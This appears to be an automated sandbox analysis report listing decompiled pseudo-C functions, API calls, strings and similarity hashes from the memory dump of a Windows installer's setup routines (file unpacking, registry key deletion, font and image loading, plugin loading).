0x00402e19
0x00402e2b
0x00402e2b
0x00402e33

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DD5
wsprintfA.USER32 ref: 00402E09
SetWindowTextA.USER32(?,?), ref: 00402E19
SetDlgItemTextA.USER32 ref: 00402E2B

Strings

verifying installer: %d%%, xrefs: 00402DFE, 00402E07
unpacking data: %d%%, xrefs: 00402DF7

Memory Dump Source

Source File: 0000000A.00000002.497857239.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.497842915.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.497939295.0000000000408000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.498008435.000000000040A000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498066194.0000000000415000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498090133.000000000041D000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498134401.000000000042C000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498160728.0000000000435000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498190729.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: e89816a8dfaa52ff9135695e85eb4a48f8702048c86a46640504a18df176bae7
Instruction ID: aa0a6e9b687c9e0f5cd6186ccbd59e0a61a019e4c0b35091a05eaf10890a9e1d
Opcode Fuzzy Hash: e89816a8dfaa52ff9135695e85eb4a48f8702048c86a46640504a18df176bae7
Instruction Fuzzy Hash: A5F06D7054020CFBEF206F60CE0ABAE3769EB10345F00803AFA06B51D0CBB899558F9A

Uniqueness

Uniqueness Score: -1.00%

Function 004027DF, Relevance: 9.1, APIs: 6, Instructions: 86
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004027DF(void* __ebx, void* __eflags) {
				void* _t26;
				long _t31;
				void* _t45;
				void* _t49;
				void* _t51;
				void* _t54;
				void* _t55;
				void* _t56;

				_t45 = __ebx;
				 *((intOrPtr*)(_t56 - 0xc)) = 0xfffffd66;
				_t50 = E00402BCE(0xfffffff0);
				 *(_t56 - 0x78) = _t23;
				if(E00405C52(_t50) == 0) {
					E00402BCE(0xffffffed);
				}
				E00405DC1(_t50);
				_t26 = E00405DE6(_t50, 0x40000000, 2);
				 *(_t56 + 8) = _t26;
				if(_t26 != 0xffffffff) {
					_t31 =  *0x42f458;
					 *(_t56 - 0x30) = _t31;
					_t49 = GlobalAlloc(0x40, _t31);
					if(_t49 != _t45) {
						E0040343E(_t45);
						E00403428(_t49,  *(_t56 - 0x30));
						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
						 *(_t56 - 0x38) = _t54;
						if(_t54 != _t45) {
							E004031B7(_t47,  *((intOrPtr*)(_t56 - 0x24)), _t45, _t54,  *(_t56 - 0x20));
							while( *_t54 != _t45) {
								_t47 =  *_t54;
								_t55 = _t54 + 8;
								 *(_t56 - 0x8c) =  *_t54;
								E00405DA1( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
								_t54 = _t55 +  *(_t56 - 0x8c);
							}
							GlobalFree( *(_t56 - 0x38));
						}
						E00405E8D( *(_t56 + 8), _t49,  *(_t56 - 0x30));
						GlobalFree(_t49);
						 *((intOrPtr*)(_t56 - 0xc)) = E004031B7(_t47, 0xffffffff,  *(_t56 + 8), _t45, _t45);
					}
					CloseHandle( *(_t56 + 8));
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t56 - 0xc)) < _t45) {
					_t51 = 0xffffffef;
					DeleteFileA( *(_t56 - 0x78));
					 *((intOrPtr*)(_t56 - 4)) = 1;
				}
				_push(_t51);
				E00401423();
				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t56 - 4));
				return 0;
			}

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402833
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040284F
GlobalFree.KERNEL32 ref: 0040288E
GlobalFree.KERNEL32 ref: 004028A1
CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 004028B9
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004028CD

Memory Dump Source

Source File: 0000000A.00000002.497857239.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.497842915.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.497939295.0000000000408000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.498008435.000000000040A000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498066194.0000000000415000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498090133.000000000041D000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498134401.000000000042C000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498160728.0000000000435000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498190729.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: be02276d34b52aff680f2bf82877302e2ab7172cbc5be37e117c6ddc7b4cc79d
Instruction ID: 6e19ad8f311a8fe4d121ff6d49c8506e1ed5368105aa9b5939d25a16afe37da6
Opcode Fuzzy Hash: be02276d34b52aff680f2bf82877302e2ab7172cbc5be37e117c6ddc7b4cc79d
Instruction Fuzzy Hash: C0219F72800124BBDF217FA5CE48D9E7E79EF09324F14823EF450762D1CA7949418FA8

Uniqueness

Uniqueness Score: -1.00%

Function 00402CD0, Relevance: 7.6, APIs: 5, Instructions: 84
registryCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E00402CD0(void* __eflags, void* _a4, char* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				char _v276;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004060D3(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v276);
						_push(0);
						while(RegEnumKeyA(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402CD0(__eflags, _v8,  &_v276, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v276);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E00406656(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyA(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueA(_v8, 0,  &_v276,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}

APIs

RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402D24
RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402D70
RegCloseKey.ADVAPI32(?,?,?), ref: 00402D79
RegDeleteKeyA.ADVAPI32(?,?), ref: 00402D90
RegCloseKey.ADVAPI32(?,?,?), ref: 00402D9B

Memory Dump Source

Source File: 0000000A.00000002.497857239.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.497842915.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.497939295.0000000000408000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.498008435.000000000040A000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498066194.0000000000415000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498090133.000000000041D000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498134401.000000000042C000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498160728.0000000000435000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498190729.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: 681fed8778fb2982ecb5527b851c998c3744aa6ef2e2e43ab789fcfdd1fcd395
Instruction ID: d75478e88f471254037528958efdeb905634950da4f4823c7bb408bf4a1a64a1
Opcode Fuzzy Hash: 681fed8778fb2982ecb5527b851c998c3744aa6ef2e2e43ab789fcfdd1fcd395
Instruction Fuzzy Hash: 44215771900108BBEF129F90CE89EEE7A7DEF44344F100476FA55B11A0E7B48E54AA68

Uniqueness

Uniqueness Score: -1.00%

Function 00401D65, Relevance: 7.6, APIs: 5, Instructions: 75
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00401D65(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				CHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t58;
				long _t61;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x1b) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x20));
				} else {
					E00402BAC(2);
					 *((intOrPtr*)(__ebp - 0x38)) = __edx;
				}
				_t55 =  *(_t65 - 0x1c);
				 *(_t65 + 8) = _t30;
				_t58 = _t55 & 0x00000004;
				 *(_t65 - 0xc) = _t55 & 0x00000003;
				 *(_t65 - 0x34) = _t55 >> 0x1f;
				 *(_t65 - 0x30) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x24) & 0x0000ffff;
				} else {
					_t38 = E00402BCE(0x11);
				}
				 *(_t65 - 8) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x84);
				asm("sbb edi, edi");
				_t61 = LoadImageA( ~_t58 &  *0x42f440,  *(_t65 - 8),  *(_t65 - 0xc),  *(_t65 - 0x7c) *  *(_t65 - 0x34),  *(_t65 - 0x78) *  *(_t65 - 0x30),  *(_t65 - 0x1c) & 0x0000fef0);
				_t48 = SendMessageA( *(_t65 + 8), 0x172,  *(_t65 - 0xc), _t61);
				if(_t48 != _t53 &&  *(_t65 - 0xc) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x28)) >= _t53) {
					_push(_t61);
					E004061AB();
				}
				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}

APIs

GetDlgItem.USER32 ref: 00401D7E
GetClientRect.USER32 ref: 00401DCC
LoadImageA.USER32 ref: 00401DFC
SendMessageA.USER32 ref: 00401E10
DeleteObject.GDI32(00000000), ref: 00401E20

Memory Dump Source

Source File: 0000000A.00000002.497857239.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.497842915.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.497939295.0000000000408000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.498008435.000000000040A000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498066194.0000000000415000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498090133.000000000041D000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498134401.000000000042C000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498160728.0000000000435000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498190729.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 9d39b7960c4b589ca11e41561aab3825f23cbdbd0ce465e9420b3b3e566fd9b2
Instruction ID: af2208a9c993d9ce4f8579721101e2d802b93c806783de9e53f89228710c5587
Opcode Fuzzy Hash: 9d39b7960c4b589ca11e41561aab3825f23cbdbd0ce465e9420b3b3e566fd9b2
Instruction Fuzzy Hash: EA212A72E00109AFCF15DFA4DD85AAEBBB5EB48304F24407EF901F62A1CB389951DB54

Uniqueness

Uniqueness Score: -1.00%

Function 00401E35, Relevance: 7.5, APIs: 5, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00401E35(intOrPtr __edx) {
				void* __esi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				struct HDC__* _t31;
				void* _t33;
				void* _t35;

				_t30 = __edx;
				_t31 = GetDC( *(_t35 - 8));
				_t9 = E00402BAC(2);
				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
				0x40b850->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t31);
				 *0x40b860 = E00402BAC(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x18));
				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
				 *0x40b867 = 1;
				 *0x40b864 = _t15 & 0x00000001;
				 *0x40b865 = _t15 & 0x00000002;
				 *0x40b866 = _t15 & 0x00000004;
				E004062E0(_t9, _t31, _t33, 0x40b86c,  *((intOrPtr*)(_t35 - 0x24)));
				_t18 = CreateFontIndirectA(0x40b850);
				_push(_t18);
				_push(_t33);
				E004061AB();
				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

APIs

GetDC.USER32(?), ref: 00401E38
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
MulDiv.KERNEL32(00000000,00000000), ref: 00401E5A
ReleaseDC.USER32 ref: 00401E6B
CreateFontIndirectA.GDI32(0040B850), ref: 00401EBA

Memory Dump Source

Source File: 0000000A.00000002.497857239.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.497842915.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.497939295.0000000000408000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.498008435.000000000040A000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498066194.0000000000415000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498090133.000000000041D000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498134401.000000000042C000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498160728.0000000000435000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498190729.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: d1cbb2668a8e0048c904ace968a64d6fe2784e3b1926127080350a50dd5622c8
Instruction ID: bda7ea4a963eadc9936f181c2ed760bd7850ebe674c1e58b805f7706cadb7525
Opcode Fuzzy Hash: d1cbb2668a8e0048c904ace968a64d6fe2784e3b1926127080350a50dd5622c8
Instruction Fuzzy Hash: A3016D72504248AEE7007BB1AE4AA9A3FF8E755301F10887AF141B61F2CB7804458B6C

Uniqueness

Uniqueness Score: -1.00%

Function 00404B1A, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00404B1A(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t53;

				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;
				if(_t21 == 0) {
					_push(0x14);
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) {
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
				_t29 = E004062E0(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E004062E0(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E004062E0(_t41, _t47, 0x42a8b8, 0x42a8b8, _a8);
				wsprintfA(_t32 + lstrlenA(0x42a8b8), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				return SetDlgItemTextA( *0x42ec18, _a4, 0x42a8b8);
			}

APIs

lstrlenA.KERNEL32(0042A8B8,0042A8B8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A35,000000DF,00000000,00000400,?), ref: 00404BB8
wsprintfA.USER32 ref: 00404BC0
SetDlgItemTextA.USER32 ref: 00404BD3

Strings

%u.%u%s%s, xrefs: 00404BA2

Memory Dump Source

Source File: 0000000A.00000002.497857239.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.497842915.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.497939295.0000000000408000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.498008435.000000000040A000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498066194.0000000000415000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498090133.000000000041D000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498134401.000000000042C000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498160728.0000000000435000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498190729.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 08f9c178ad4fdce5ba5a134203cc09d67d66b4423bbb0e6013138279e3fed682
Instruction ID: 2e00c39cbbb7080f6c78f9bc89fda30cce30f66f6b884b1aab771d4f97bc656b
Opcode Fuzzy Hash: 08f9c178ad4fdce5ba5a134203cc09d67d66b4423bbb0e6013138279e3fed682
Instruction Fuzzy Hash: 9111B7736041282BDB00656D9C42FAE3298DB85374F25027BFA26F71D1EA79DC2242ED

Uniqueness

Uniqueness Score: -1.00%

Function 00401C2E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401C2E(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				CHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t61;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402BAC(3);
				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
				 *(_t64 - 8) = _t29;
				_t30 = E00402BAC(4);
				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00402BCE(0x33);
				}
				__eflags =  *(_t64 - 0x14) & 0x00000002;
				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402BCE(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t59 = E00402BCE();
					_t32 = E00402BCE();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t59;
					__eflags = _t35;
					_t36 = FindWindowExA( *(_t64 - 8),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t61 = E00402BAC();
					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
					_t41 = E00402BAC(2);
					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
					_t56 =  *(_t64 - 0x14) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8));
						L10:
						 *(_t64 - 0xc) = _t36;
					} else {
						_t42 = SendMessageTimeoutA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8), _t46, _t56, _t64 - 0xc);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
					_push( *(_t64 - 0xc));
					E004061AB();
				}
				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
SendMessageA.USER32 ref: 00401CB6

Strings

!, xrefs: 00401C6A

Memory Dump Source

Source File: 0000000A.00000002.497857239.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.497842915.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.497939295.0000000000408000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.498008435.000000000040A000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498066194.0000000000415000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498090133.000000000041D000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498134401.000000000042C000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498160728.0000000000435000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498190729.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 7f513ab6a3ebb62765d7b61154200c887099e4f9fcc296ff57337de7f7cd59e8
Instruction ID: c2b49ebb6df65f965b847d27db55c839bb0ece9d55d01ae65463d35699866107
Opcode Fuzzy Hash: 7f513ab6a3ebb62765d7b61154200c887099e4f9fcc296ff57337de7f7cd59e8
Instruction Fuzzy Hash: 1B215E71A44208BEEB05AFB5D98AAAD7FB5EF44304F20447EF502B61D1D6B88541DB28

Uniqueness

Uniqueness Score: -1.00%

Function 00405BE5, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405BE5(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x40a014);
				}
				return _t7;
			}

0x00405be6
0x00405bfd
0x00405c05
0x00405c05
0x00405c0d

APIs

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403473,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00405BEB
CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403473,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00405BF4
lstrcatA.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405C05

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405BE5

Memory Dump Source

Source File: 0000000A.00000002.497857239.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.497842915.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.497939295.0000000000408000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.498008435.000000000040A000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498066194.0000000000415000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498090133.000000000041D000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498134401.000000000042C000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498160728.0000000000435000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498190729.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-823278215
Opcode ID: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
Instruction ID: 4aa12e920610aceb8e029670fdf9df43119f1a02786e7ce54b96f7a39d5643bc
Opcode Fuzzy Hash: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
Instruction Fuzzy Hash: E3D0A762A09630BAD20136655C09DCB19088F12701B05006BF101B2191C73C4C5147FD

Uniqueness

Uniqueness Score: -1.00%

Function 0040209D, Relevance: 6.1, APIs: 4, Instructions: 73
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E0040209D(void* __ebx, void* __eflags) {
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x42f518");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x42f4e8 =  *0x42f4e8 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402BCE(0xfffffff0);
				 *(_t34 + 8) = E00402BCE(1);
				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
					L3:
					_t30 = LoadLibraryExA(_t32, _t27, 8);
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E00405374(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x430000, 0x40b890, 0x40a000);
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x20)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E00403A00(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t30 = GetModuleHandleA(_t32);
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}

0x0040209d
0x0040209d
0x004020a2
0x004020a9
0x00402164
0x004022dd
0x004022dd
0x00402a5a
0x00402a5d
0x00402a69
0x00402a69
0x004020b8
0x004020c2
0x004020c5
0x004020d4
0x004020de
0x004020e2
0x0040215d
0x00000000
0x0040215d
0x004020e4
0x004020ed
0x004020f1
0x00402135
0x004020f3
0x004020f6
0x004020f9
0x00402129
0x004020fb
0x004020fe
0x00402107
0x00402109
0x00402109
0x00402107
0x004020f9
0x0040213d
0x00402152
0x00402152
0x00000000
0x0040213d
0x004020ce
0x004020d2
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 004020C8

Part of subcall function 00405374: lstrlenA.KERNEL32(0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 004053AD
Part of subcall function 00405374: lstrlenA.KERNEL32(00402EC9,0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 004053BD
Part of subcall function 00405374: lstrcatA.KERNEL32(0042A098,00402EC9,00402EC9,0042A098,00000000,00000000,00000000), ref: 004053D0
Part of subcall function 00405374: SetWindowTextA.USER32(0042A098,0042A098), ref: 004053E2
Part of subcall function 00405374: SendMessageA.USER32 ref: 00405408
Part of subcall function 00405374: SendMessageA.USER32 ref: 00405422
Part of subcall function 00405374: SendMessageA.USER32 ref: 00405430

LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 004020D8
GetProcAddress.KERNEL32(00000000,?), ref: 004020E8
FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402152

Memory Dump Source

Source File: 0000000A.00000002.497857239.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.497842915.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.497939295.0000000000408000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.498008435.000000000040A000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498066194.0000000000415000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498090133.000000000041D000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498134401.000000000042C000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498160728.0000000000435000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498190729.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID:
API String ID: 2987980305-0
Opcode ID: 9a7dce7029d6e90e63f6b2ec8c5914d556926361ac66931f3f99007585ef5c9d
Instruction ID: e3fe6dffd4d776efa863efd9403cf6e1974d247a329121c392e1043855ccd094
Opcode Fuzzy Hash: 9a7dce7029d6e90e63f6b2ec8c5914d556926361ac66931f3f99007585ef5c9d
Instruction Fuzzy Hash: 2721EE32A00115EBCF20BF648F49B9F76B1AF14359F20423BF651B61D1CBBC49829A5D

Uniqueness

Uniqueness Score: -1.00%

